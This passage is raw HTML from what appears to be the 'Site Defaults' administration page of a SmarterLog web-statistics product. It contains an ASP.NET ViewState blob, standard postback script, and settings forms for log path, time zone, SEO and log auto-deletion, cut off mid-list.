UgKEZSKQtHb29nbGUgKEhLKQtHb29nbGUgKElOKQtHb29nbGUgKElMKQtHb29nbGUgKElUKQtHb29nbGUgKEpQKQtHb29nbGUgKEtSKQtHb29nbGUgKE1YKQtHb29nbGUgKE5MKQtHb29nbGUgKFRXKQtHb29nbGUgKFJVKQtHb29nbGUgKFVLKRUWATEBMgE0ATUBNwE4ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMTkCMjACMjECMjICMjQCMjMUKwMWZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkGAQFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYYBSRjdGwwMCRNUEgkY2hrU2VvRW5hYmxlZF9TZXR0aW5nQ2hlY2sFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMAVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMwVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ0BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDUFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNgVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ3BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDgFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkOQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMgVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMwVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNgVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNwVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxOAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxOQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMQUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTMPMtwLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAtAU2VvT3B0aW9ucwH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAADVNlb09wdGlvbnNUYWILZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTIPMuALAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAA1AQXV0b0RlbGV0aW9uAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAPQXV0b0RlbGV0aW9uVGFiC2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0xDzLWCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAIQE9wdGlvbnMB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAAApPcHRpb25zVGFiC2RBze0HvVYCeQNVL1xF6eKpgCsI6ghwuj3GJCtqF1DLLA==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel3',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Site Defaults
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           
   
<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
   <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Options</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Auto-Deletion</span></span></a></li>
   <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>SEO Options</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>


       </div>
       <div id="Scrollable" class="ContentDiv">
           
   <div id="ctl00_MPH_UpdatePanel3">
   
           
<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_OptionsTab" />
               <div id='ctl00_MPH_OptionsTab' class='' >
           <span id="ctl00_MPH_OptionsTab">
                   <table id="ctl00_MPH_tblAdministrativeEmails" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtDefaultSmarterLogDirText">
                   <td id="ctl00_MPH_txtDefaultSmarterLogDirText_Label" class="Indent Fixed">SmarterLog Path</td><td id="ctl00_MPH_txtDefaultSmarterLogDirText_Setting" class="Setting"><input name="ctl00$MPH$txtDefaultSmarterLogDirText_SettingText" type="text" value="C:\SmarterLogs\" id="ctl00_MPH_txtDefaultSmarterLogDirText_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_lstTimeZone">
                   <td id="ctl00_MPH_lstTimeZone_Label" class="Indent Fixed">Time Zone</td><td id="ctl00_MPH_lstTimeZone_Setting" class="Setting"><select name="ctl00$MPH$lstTimeZone_SettingDropDown" id="ctl00_MPH_lstTimeZone_SettingDropDown">
                       <option value="0">(GMT-12:00) International Date Line West</option>
                       <option selected="selected" value="1">(GMT-11:00) Midway Island, Samoa</option>
                       <option value="2">(GMT-10:00) Hawaii</option>
                       <option value="3">(GMT-09:00) Alaska</option>
                       <option value="-2147483579">(GMT-08:00) Tijuana, Baja California</option>
                       <option value="4">(GMT-08:00) Pacific Time (US &amp; Canada)</option>
                       <option value="-2147483580">(GMT-07:00) Chihuahua, La Paz, Mazatlan - New</option>
                       <option value="10">(GMT-07:00) Mountain Time (US &amp; Canada)</option>
                       <option value="15">(GMT-07:00) Arizona</option>
                       <option value="13">(GMT-07:00) Chihuahua, La Paz, Mazatlan - Old</option>
                       <option value="25">(GMT-06:00) Saskatchewan</option>
                       <option value="30">(GMT-06:00) Guadalajara, Mexico City, Monterrey - Old</option>
                       <option value="20">(GMT-06:00) Central Time (US &amp; Canada)</option>
                       <option value="-2147483581">(GMT-06:00) Guadalajara, Mexico City, Monterrey - New</option>
                       <option value="33">(GMT-06:00) Central America</option>
                       <option value="35">(GMT-05:00) Eastern Time (US &amp; Canada)</option>
                       <option value="40">(GMT-05:00) Indiana (East)</option>
                       <option value="45">(GMT-05:00) Bogota, Lima, Quito, Rio Branco</option>
                       <option value="-2147483573">(GMT-04:30) Caracas</option>
                       <option value="-2147483576">(GMT-04:00) Manaus</option>
                       <option value="50">(GMT-04:00) Atlantic Time (Canada)</option>
                       <option value="55">(GMT-04:00) La Paz</option>
                       <option value="56">(GMT-04:00) Santiago</option>
                       <option value="60">(GMT-03:30) Newfoundland</option>
                       <option value="70">(GMT-03:00) Buenos Aires, Georgetown</option>
                       <option value="73">(GMT-03:00) Greenland</option>
                       <option value="65">(GMT-03:00) Brasilia</option>
                       <option value="-2147483575">(GMT-03:00) Montevideo</option>
                       <option value="75">(GMT-02:00) Mid-Atlantic</option>
                       <option value="80">(GMT-01:00) Azores</option>
                       <option value="83">(GMT-01:00) Cape Verde Is.</option>
                       <option value="90">(GMT) Casablanca, Monrovia, Reykjavik</option>
                       <option value="85">(GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London</option>
                       <option value="95">(GMT+01:00) Belgrade, Bratislava, Budapest, Ljubljana, Prague</option>
                       <option value="100">(GMT+01:00) Sarajevo, Skopje, Warsaw, Zagreb</option>
                       <option value="105">(GMT+01:00) Brussels, Copenhagen, Madrid, Paris</option>
                       <option value="110">(GMT+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna</option>
                       <option value="113">(GMT+01:00) West Central Africa</option>
                       <option value="130">(GMT+02:00) Athens, Bucharest, Istanbul</option>
                       <option value="-2147483583">(GMT+02:00) Beirut</option>
                       <option value="-2147483582">(GMT+02:00) Amman</option>
                       <option value="135">(GMT+02:00) Jerusalem</option>
                       <option value="-2147483578">(GMT+02:00) Windhoek</option>
                       <option value="125">(GMT+02:00) Helsinki, Kyiv, Riga, Sofia, Tallinn, Vilnius</option>
                       <option value="140">(GMT+02:00) Harare, Pretoria</option>
                       <option value="115">(GMT+02:00) Minsk</option>
                       <option value="120">(GMT+02:00) Cairo</option>
                       <option value="155">(GMT+03:00) Nairobi</option>
                       <option value="145">(GMT+03:00) Moscow, St. Petersburg, Volgograd</option>
                       <option value="150">(GMT+03:00) Kuwait, Riyadh</option>
                       <option value="158">(GMT+03:00) Baghdad</option>
                       <option value="-2147483577">(GMT+03:00) Tbilisi</option>
                       <option value="160">(GMT+03:30) Tehran</option>
                       <option value="165">(GMT+04:00) Abu Dhabi, Muscat</option>
                       <option value="170">(GMT+04:00) Caucasus Standard Time</option>
                       <option value="-2147483584">(GMT+04:00) Baku</option>
                       <option value="-2147483574">(GMT+04:00) Yerevan</option>
                       <option value="175">(GMT+04:30) Kabul</option>
                       <option value="180">(GMT+05:00) Ekaterinburg</option>
                       <option value="185">(GMT+05:00) Islamabad, Karachi, Tashkent</option>
                       <option value="200">(GMT+05:30) Sri Jayawardenepura</option>
                       <option value="190">(GMT+05:30) Chennai, Kolkata, Mumbai, New Delhi</option>
                       <option value="193">(GMT+05:45) Kathmandu</option>
                       <option value="201">(GMT+06:00) Almaty, Novosibirsk</option>
                       <option value="195">(GMT+06:00) Astana, Dhaka</option>
                       <option value="203">(GMT+06:30) Yangon (Rangoon)</option>
                       <option value="207">(GMT+07:00) Krasnoyarsk</option>
                       <option value="205">(GMT+07:00) Bangkok, Hanoi, Jakarta</option>
                       <option value="225">(GMT+08:00) Perth</option>
                       <option value="210">(GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi</option>
                       <option value="227">(GMT+08:00) Irkutsk, Ulaan Bataar</option>
                       <option value="220">(GMT+08:00) Taipei</option>
                       <option value="215">(GMT+08:00) Kuala Lumpur, Singapore</option>
                       <option value="240">(GMT+09:00) Yakutsk</option>
                       <option value="230">(GMT+09:00) Seoul</option>
                       <option value="235">(GMT+09:00) Osaka, Sapporo, Tokyo</option>
                       <option value="250">(GMT+09:30) Adelaide</option>
                       <option value="245">(GMT+09:30) Darwin</option>
                       <option value="275">(GMT+10:00) Guam, Port Moresby</option>
                       <option value="255">(GMT+10:00) Canberra, Melbourne, Sydney</option>
                       <option value="270">(GMT+10:00) Vladivostok</option>
                       <option value="260">(GMT+10:00) Brisbane</option>
                       <option value="265">(GMT+10:00) Hobart</option>
                       <option value="280">(GMT+11:00) Magadan, Solomon Is., New Caledonia</option>
                       <option value="285">(GMT+12:00) Fiji, Kamchatka, Marshall Is.</option>
                       <option value="290">(GMT+12:00) Auckland, Wellington</option>
                       <option value="300">(GMT+13:00) Nuku&#39;alofa</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_chkSeoEnabled">
                   <td id="ctl00_MPH_chkSeoEnabled_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkSeoEnabled_Setting" class="Setting"><input id="ctl00_MPH_chkSeoEnabled_SettingCheck" type="checkbox" name="ctl00$MPH$chkSeoEnabled_SettingCheck" checked="checked" /><label for="ctl00_MPH_chkSeoEnabled_SettingCheck">Enable SEO</label></td>
               </tr><tr id="ctl00_MPH_txtDefaultDocuments">
                   <td id="ctl00_MPH_txtDefaultDocuments_Setting" class="Indent Setting" colspan="2"><span class='Label'>Default Documents (one per line)<br /></span><textarea name="ctl00$MPH$txtDefaultDocuments_SettingText" rows="4" cols="50" id="ctl00_MPH_txtDefaultDocuments_SettingText" class="text">

index.htm
index.html
default.asp
default.aspx</textarea></td>
               </tr>
           </table>
               </span></div>
       
               <div id='ctl00_MPH_AutoDeletionTab' class='' style='display:none'>
           <span id="ctl00_MPH_AutoDeletionTab">
                   <table id="ctl00_MPH_tblOptions" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_lstMonthsToKeepSmStats">
                   <td id="ctl00_MPH_lstMonthsToKeepSmStats_Label" class="Indent Fixed">SmarterLogs</td><td id="ctl00_MPH_lstMonthsToKeepSmStats_Setting" class="Setting"><select name="ctl00$MPH$lstMonthsToKeepSmStats_SettingDropDown" id="ctl00_MPH_lstMonthsToKeepSmStats_SettingDropDown">
                       <option value="0">Never Delete</option>
                       <option selected="selected" value="1">Delete after 1 months</option>
                       <option value="2">Delete after 2 months</option>
                       <option value="3">Delete after 3 months</option>
                       <option value="4">Delete after 4 months</option>
                       <option value="5">Delete after 5 months</option>
                       <option value="6">Delete after 6 months</option>
                       <option value="7">Delete after 7 months</option>
                       <option value="8">Delete after 8 months</option>
                       <option value="9">Delete after 9 months</option>
                       <option value="10">Delete after 10 months</option>
                       <option value="11">Delete after 11 months</option>
                       <option value="12">Delete after 12 months</option>
                       <option value="13">Delete after 13 months</option>
                       <option value="14">Delete after 14 months</option>
                       <option value="15">Delete after 15 months</option>
                       <option value="16">Delete after 16 months</option>
                       <option value="17">Delete after 17 months</option>
